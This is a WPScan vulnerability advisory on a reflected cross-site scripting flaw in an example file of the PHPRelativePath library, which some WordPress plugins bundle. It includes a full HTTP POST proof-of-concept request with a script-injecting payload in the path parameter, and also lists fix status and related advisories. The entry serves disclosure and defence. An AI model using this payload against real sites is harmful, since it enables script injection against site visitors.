Multiple Plugins – Reflected Cross-Site Scripting via PHPRelativePath Library | Plugin Vulnerabilities

Description

The plugins are using the PHPRelativePath library, which contain an example file affected a Reflected Cross-Site Scripting

Proof of Concept

POST /wp-content/plugins/mpl-publisher/vendor/grandt/relativepath/RelativePath.Example1.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: close
Upgrade-Insecure-Requests: 1

path=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Affects Plugins

Fixed in 1.29.2

woo-pdf-invoices-bulk-download

No known fix

No known fix

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

7b9799f2-c3b3-4ab9-b9e5-9a2b4ccccfeb

Timeline

Publicly Published

2021-08-25 (about 4 years ago)

Added

2021-08-25 (about 4 years ago)

Last Updated

2021-08-25 (about 4 years ago)

Other

Published

Title

Published

2014-08-01

Title

Count per Day 3.2.5 - counter.php HTTP Referer Header XSS

Published

2024-04-09

Title

Bold Page Builder < 4.8.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via AI Features

Published

2024-07-18

Title

Search Filter Pro < 2.5.18 - Admin+ Stored XSS

Published

2024-08-26

Title

Gutenverse < 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-11-15

Title

Pixel Cat Lite < 2.6.3 - Admin+ Stored Cross-Site Scripting